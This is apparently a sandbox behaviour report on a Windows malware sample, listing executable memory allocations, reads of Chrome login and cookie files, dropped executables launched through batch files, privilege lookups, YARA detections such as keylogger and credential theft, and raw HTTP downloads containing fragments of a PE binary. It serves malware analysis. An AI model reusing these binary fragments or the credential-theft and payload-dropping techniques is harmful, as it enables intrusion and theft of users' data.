NtAllocateVirtualMemory July 31, 2021, 1:26 p.m.	process_identifier: 2032 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0040c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2021, 1:26 p.m.	process_identifier: 2032 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x008e0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2021, 1:26 p.m.	process_identifier: 2032 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00416000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2021, 1:26 p.m.	process_identifier: 2032 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x008e1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2021, 1:26 p.m.	process_identifier: 2032 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0041a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2021, 1:26 p.m.	process_identifier: 2032 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00417000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2021, 1:26 p.m.	process_identifier: 2032 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x002ba000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2021, 1:26 p.m.	process_identifier: 2032 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0041b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2021, 1:26 p.m.	process_identifier: 2032 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0040a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2021, 1:26 p.m.	process_identifier: 2032 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0041c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2021, 1:26 p.m.	process_identifier: 2032 region_size: 327680 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef50000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2021, 1:26 p.m.	process_identifier: 2032 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef50000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2021, 1:26 p.m.	process_identifier: 2032 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef50000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2021, 1:26 p.m.	process_identifier: 2032 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef58000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2021, 1:26 p.m.	process_identifier: 2032 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef40000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2021, 1:26 p.m.	process_identifier: 2032 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef40000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2021, 1:26 p.m.	process_identifier: 2032 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00418000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2021, 1:26 p.m.	process_identifier: 2032 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0041d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2021, 1:26 p.m.	process_identifier: 2032 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04d9f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2021, 1:26 p.m.	process_identifier: 2032 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04d90000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2021, 1:26 p.m.	process_identifier: 2032 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x002bc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2021, 1:26 p.m.	process_identifier: 2032 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04d91000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2021, 1:26 p.m.	process_identifier: 2032 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x008e2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2021, 1:26 p.m.	process_identifier: 2032 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x008e3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2021, 1:26 p.m.	process_identifier: 2032 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x008e4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2021, 1:26 p.m.	process_identifier: 2032 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x008e5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2021, 1:26 p.m.	process_identifier: 2032 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0042c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2021, 1:26 p.m.	process_identifier: 2032 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x008e6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory July 31, 2021, 1:26 p.m.	process_identifier: 2032 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6cac2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2021, 1:26 p.m.	process_identifier: 2032 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0041e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2021, 1:26 p.m.	process_identifier: 2032 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0041f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2021, 1:26 p.m.	process_identifier: 2032 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0040d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2021, 1:26 p.m.	process_identifier: 2032 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00419000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2021, 1:26 p.m.	process_identifier: 2032 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x008e7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2021, 1:26 p.m.	process_identifier: 2032 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x008e8000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2021, 1:26 p.m.	process_identifier: 2032 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x008e9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2021, 1:26 p.m.	process_identifier: 2032 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x008ea000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2021, 1:26 p.m.	process_identifier: 2032 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x008eb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2021, 1:26 p.m.	process_identifier: 2032 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x008ec000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2021, 1:26 p.m.	process_identifier: 2032 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0040e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Steals private information from local Internet browsers (4 events)

file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local State
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Web Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Cookies

Creates executable files on the filesystem (8 events)

file	C:\Users\test22\AppData\Local\Temp\AD71.tmp\AD82.tmp\extd.exe
file	C:\Users\test22\AppData\Local\Temp\mine.exe
file	C:\Users\test22\AppData\Local\Temp\2741\clo.exe
file	C:\Users\test22\AppData\Local\Temp\2741\welldone.exe
file	C:\Users\test22\AppData\Local\Temp\AF46.tmp\AF56.tmp\extd.exe
file	C:\Users\test22\AppData\Local\Temp\AD71.tmp\AD82.tmp\AD92.bat
file	C:\Users\test22\AppData\Local\Temp\clip.exe
file	C:\Users\test22\AppData\Local\Temp\AF46.tmp\AF56.tmp\AF57.bat

Creates a suspicious process (2 events)

cmdline	"C:\Windows\system32\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\AD71.tmp\AD82.tmp\AD92.bat C:\Users\test22\AppData\Local\Temp\mine.exe"
cmdline	"C:\Windows\system32\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\AF46.tmp\AF56.tmp\AF57.bat C:\Users\test22\AppData\Local\Temp\clip.exe"

Drops a binary and executes it (5 events)

file	C:\Users\test22\AppData\Local\Temp\mine.exe
file	C:\Users\test22\AppData\Local\Temp\clip.exe
file	C:\Users\test22\AppData\Local\Temp\AD71.tmp\AD82.tmp\extd.exe
file	C:\Users\test22\AppData\Local\Temp\2741\welldone.exe
file	C:\Users\test22\AppData\Local\Temp\2741\clo.exe

Drops an executable to the user AppData folder (1 event)

file	C:\Users\test22\AppData\Local\Temp\2741\clo.exe

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses July 31, 2021, 1:26 p.m.	flags: 15 family: 0		111	0

An executable file was downloaded by the process @sc4lly1337.exe (2 events)

Time & API	Arguments	Status	Return	Repeated
recv July 31, 2021, 1:27 p.m.	buffer: HTTP/1.1 200 OK Date: Sat, 31 Jul 2021 04:57:28 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Fri, 30 Jul 2021 11:34:54 GMT ETag: "6fa00-5c8559bc7ca73" Accept-Ranges: bytes Content-Length: 457216 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdos-program MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEdÜmsZð/2`@PñÈ `!ÐÈ¨öH.codeZ\ `.textÅp` `.rdata-KLd@@.pdataÈÐ°@@.data#ðÂ@À.rsrc`! "Ø@@Hì(IÇÀ`H1ÒH¹D@èã_H1Éèá_H ôM1ÀHÇÂH1ÉèÎ_HÿóH¸ð@H>ôèèè»Íè®Ãè=¼è¹è°èº¤èÝ`è ïèÿ×Hºð@H Æóè-H¹õÿÿÿÿÿÿÿè`_HëóHÇÁHìQL ÐôM1ÀHÇÂHÇÁHì èò»HÄ(HÄH wôèÄIÇÁI¸hð@HZôHÇÁè&ÃH WôèúÃIÇÁI¸Xð@H:ôHÇÁèöÂHìHÇÂ¡H¸\@PI¹xð@IÇÀHÇÁHì è«HÄ@HÌóHº6ð@H cóè*H ßóèrÃIÇÁI¸Xð@HÂóHÇÁènÂHvHÁèë²QHì(èÑHÄ(YPQHì èÁHÄ YPHì è0HÄ(H £òZèñèÆL=±òIÿuè 1èGèè[H øñèÇ]H üñèÁ]Hì(èª^èE´èÆèËèýèñ¶HÄ(ÃHL$HT$LD$UAWAVHÇÀHìHÇ$HÿÈuïHì(H$àHL$(Hìè&HÄÿt$(YèÈ`HD$0ÿt$0Yè¹¶HÀPXD$8HìHÇÂHD$XPM1ÉIÇÀHÇÁHì è HÄ@HD$@HìHÇÂHD$hPM1ÉIÇÀHÇÁHì èá HÄ@HD$PÇD$`ÇD$hÇD$pÇD$xÇ$Ç$ÇD$hÇD$8 ÿt$@XH$ÿt$0XH$ÇD$`ëHÇÀÿ;D$`HcD$`PH¬$XEL¼$IÇL¼$H¬$L¾}M!ÿu ÿt$0XH$H¬$H¾EPLc\|$hHl$XIÁçXA/L¼$IÿÇL¼$ÿD$`lÿÿÿÇD$hÇD$`ëHÇÀÿ;D$`Lc\|$hLct$`Hl$@IÁæIc.IÇLct$`Hl$PIÁæIc.IÇIçÿLøPXD$hLc\|$`Hl$@IÁçIc/PX$Lc\|$hIÁçIc/PLc\|$hIÁçXA/Hc$PLc\|$pIÁçXA/ÿD$`XÿÿÿÇD$`ÇD$hHc$ÐPXH$ ÇD$xëLc¼$ØIÿÏLø;D$xLc\|$`IÿÇIçÿLøPXD$`Lc\|$hLct$`Hl$@IÁæIc.IÇIçÿLøPXD$hLc\|$`IÁçIc/PX$Lc\|$hIÁçIc/PLc\|$hIÁçXA/Hc$PLc\|$pIÁçXA/Lc\|$`IÁçMc</Lct$hIÁæMc4.IæÿM÷IçÿLøPXD$pLc\|$pIÁçIc/PX$H¬$ L¾ received: 2920 socket: 948	1	2920	0
recv July 31, 2021, 1:27 p.m.	buffer: HTTP/1.1 200 OK Date: Sat, 31 Jul 2021 04:57:30 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Fri, 30 Jul 2021 11:35:47 GMT ETag: "6fa00-5c8559ee88691" Accept-Ranges: bytes Content-Length: 457216 Content-Type: application/x-msdos-program MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEdÜmsZð/2`@PñÈ P!ÐÈ¨öH.codeZ\ `.textÅp` `.rdata-KLd@@.pdataÈÐ°@@.data#ðÂ@À.rsrcP! "Ø@@Hì(IÇÀ`H1ÒH¹D@èã_H1Éèá_H ôM1ÀHÇÂH1ÉèÎ_HÿóH¸ð@H>ôèèè»Íè®Ãè=¼è¹è°èº¤èÝ`è ïèÿ×Hºð@H Æóè-H¹õÿÿÿÿÿÿÿè`_HëóHÇÁHìQL ÐôM1ÀHÇÂHÇÁHì èò»HÄ(HÄH wôèÄIÇÁI¸hð@HZôHÇÁè&ÃH WôèúÃIÇÁI¸Xð@H:ôHÇÁèöÂHìHÇÂ¡H¸\@PI¹xð@IÇÀHÇÁHì è«HÄ@HÌóHº6ð@H cóè*H ßóèrÃIÇÁI¸Xð@HÂóHÇÁènÂHvHÁèë²QHì(èÑHÄ(YPQHì èÁHÄ YPHì è0HÄ(H £òZèñèÆL=±òIÿuè 1èGèè[H øñèÇ]H üñèÁ]Hì(èª^èE´èÆèËèýèñ¶HÄ(ÃHL$HT$LD$UAWAVHÇÀHìHÇ$HÿÈuïHì(H$àHL$(Hìè&HÄÿt$(YèÈ`HD$0ÿt$0Yè¹¶HÀPXD$8HìHÇÂHD$XPM1ÉIÇÀHÇÁHì è HÄ@HD$@HìHÇÂHD$hPM1ÉIÇÀHÇÁHì èá HÄ@HD$PÇD$`ÇD$hÇD$pÇD$xÇ$Ç$ÇD$hÇD$8 ÿt$@XH$ÿt$0XH$ÇD$`ëHÇÀÿ;D$`HcD$`PH¬$XEL¼$IÇL¼$H¬$L¾}M!ÿu ÿt$0XH$H¬$H¾EPLc\|$hHl$XIÁçXA/L¼$IÿÇL¼$ÿD$`lÿÿÿÇD$hÇD$`ëHÇÀÿ;D$`Lc\|$hLct$`Hl$@IÁæIc.IÇLct$`Hl$PIÁæIc.IÇIçÿLøPXD$hLc\|$`Hl$@IÁçIc/PX$Lc\|$hIÁçIc/PLc\|$hIÁçXA/Hc$PLc\|$pIÁçXA/ÿD$`XÿÿÿÇD$`ÇD$hHc$ÐPXH$ ÇD$xëLc¼$ØIÿÏLø;D$xLc\|$`IÿÇIçÿLøPXD$`Lc\|$hLct$`Hl$@IÁæIc.IÇIçÿLøPXD$hLc\|$`IÁçIc/PX$Lc\|$hIÁçIc/PLc\|$hIÁçXA/Hc$PLc\|$pIÁçXA/Lc\|$`IÁçMc</Lct$hIÁæMc4.IæÿM÷IçÿLøPXD$pLc\|$pIÁçIc/PX$H¬$ L¾}Hc$I1ÇLøPH¬$¨XEL¼$ IÿÇL¼$ ÿD$xÎþ received: 2920 socket: 948	1	2920	0

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW July 31, 2021, 1:26 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Yara rule detected in process memory (50 out of 87 events)

description	Communication using DGA	rule	Network_DGA
description	Communications use DNS	rule	Network_DNS
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Create a windows service	rule	Create_Service
description	Record Audio	rule	Sniff_Audio
description	Escalate priviledges	rule	Escalate_priviledges
description	Run a KeyLogger	rule	KeyLogger
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	Communications over HTTP	rule	Network_HTTP
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	Communications over FTP	rule	Network_FTP
description	Take ScreenShot	rule	ScreenShot
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Steal credential	rule	local_credential_Steal
description	File Downloader	rule	Network_Downloader
description	Communications over P2P network	rule	Network_P2P_Win
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerCheck__RemoteAPI
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__ConsoleCtrl
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	(no description)	rule	Check_Dlls
description	Checks if being debugged	rule	anti_dbg
description	Anti-Sandbox checks for ThreatExpert	rule	antisb_threatExpert
description	Bypass DEP	rule	disable_dep
description	Affect hook table	rule	win_hook
description	Communication using DGA	rule	Network_DGA
description	Communications use DNS	rule	Network_DNS
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Create a windows service	rule	Create_Service
description	Record Audio	rule	Sniff_Audio
description	Escalate priviledges	rule	Escalate_priviledges
description	Run a KeyLogger	rule	KeyLogger
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	Communications over HTTP	rule	Network_HTTP
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	Communications over FTP	rule	Network_FTP
description	Take ScreenShot	rule	ScreenShot
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Steal credential	rule	local_credential_Steal
description	File Downloader	rule	Network_Downloader
description	Communications over P2P network	rule	Network_P2P_Win
description	Communications PWS network	rule	PWS_CnC_memory_Zero
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerCheck__RemoteAPI

Queries for potentially installed applications (50 out of 53 events)

Time & API	Arguments	Status
RegOpenKeyExW July 31, 2021, 1:26 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall base_handle: 0x80000002 key_handle: 0x000003b4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	1
RegOpenKeyExW July 31, 2021, 1:26 p.m.	regkey_r: 7-Zip base_handle: 0x000003b4 key_handle: 0x00000204 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip	1
RegOpenKeyExW July 31, 2021, 1:26 p.m.	regkey_r: AddressBook base_handle: 0x000003b4 key_handle: 0x00000204 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook	1
RegOpenKeyExW July 31, 2021, 1:26 p.m.	regkey_r: Adobe AIR base_handle: 0x000003b4 key_handle: 0x00000204 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Adobe AIR	1
RegOpenKeyExW July 31, 2021, 1:26 p.m.	regkey_r: Connection Manager base_handle: 0x000003b4 key_handle: 0x00000204 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager	1
RegOpenKeyExW July 31, 2021, 1:26 p.m.	regkey_r: DirectDrawEx base_handle: 0x000003b4 key_handle: 0x00000204 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx	1
RegOpenKeyExW July 31, 2021, 1:26 p.m.	regkey_r: EditPlus base_handle: 0x000003b4 key_handle: 0x00000204 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus	1
RegOpenKeyExW July 31, 2021, 1:26 p.m.	regkey_r: ePageSafer base_handle: 0x000003b4 key_handle: 0x00000204 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\ePageSafer	1
RegOpenKeyExW July 31, 2021, 1:26 p.m.	regkey_r: Fontcore base_handle: 0x000003b4 key_handle: 0x00000204 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore	1
RegOpenKeyExW July 31, 2021, 1:26 p.m.	regkey_r: Google Chrome base_handle: 0x000003b4 key_handle: 0x00000204 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome	1
RegOpenKeyExW July 31, 2021, 1:26 p.m.	regkey_r: Haansoft HWord 80 Korean base_handle: 0x000003b4 key_handle: 0x00000204 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean	1
RegOpenKeyExW July 31, 2021, 1:26 p.m.	regkey_r: IE40 base_handle: 0x000003b4 key_handle: 0x00000204 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE40	1
RegOpenKeyExW July 31, 2021, 1:26 p.m.	regkey_r: IE4Data base_handle: 0x000003b4 key_handle: 0x00000204 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data	1
RegOpenKeyExW July 31, 2021, 1:26 p.m.	regkey_r: IE5BAKEX base_handle: 0x000003b4 key_handle: 0x00000204 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX	1
RegOpenKeyExW July 31, 2021, 1:26 p.m.	regkey_r: IEData base_handle: 0x000003b4 key_handle: 0x00000204 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IEData	1
RegOpenKeyExW July 31, 2021, 1:26 p.m.	regkey_r: MobileOptionPack base_handle: 0x000003b4 key_handle: 0x00000204 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack	1
RegOpenKeyExW July 31, 2021, 1:26 p.m.	regkey_r: Mozilla Thunderbird 78.4.0 (x86 ko) base_handle: 0x000003b4 key_handle: 0x00000204 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Thunderbird 78.4.0 (x86 ko)	1
RegOpenKeyExW July 31, 2021, 1:26 p.m.	regkey_r: Office14.PROPLUS base_handle: 0x000003b4 key_handle: 0x00000204 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Office14.PROPLUS	1
RegOpenKeyExW July 31, 2021, 1:26 p.m.	regkey_r: SchedulingAgent base_handle: 0x000003b4 key_handle: 0x00000204 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent	1
RegOpenKeyExW July 31, 2021, 1:26 p.m.	regkey_r: TouchEn nxKey base_handle: 0x000003b4 key_handle: 0x00000204 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\TouchEn nxKey	1
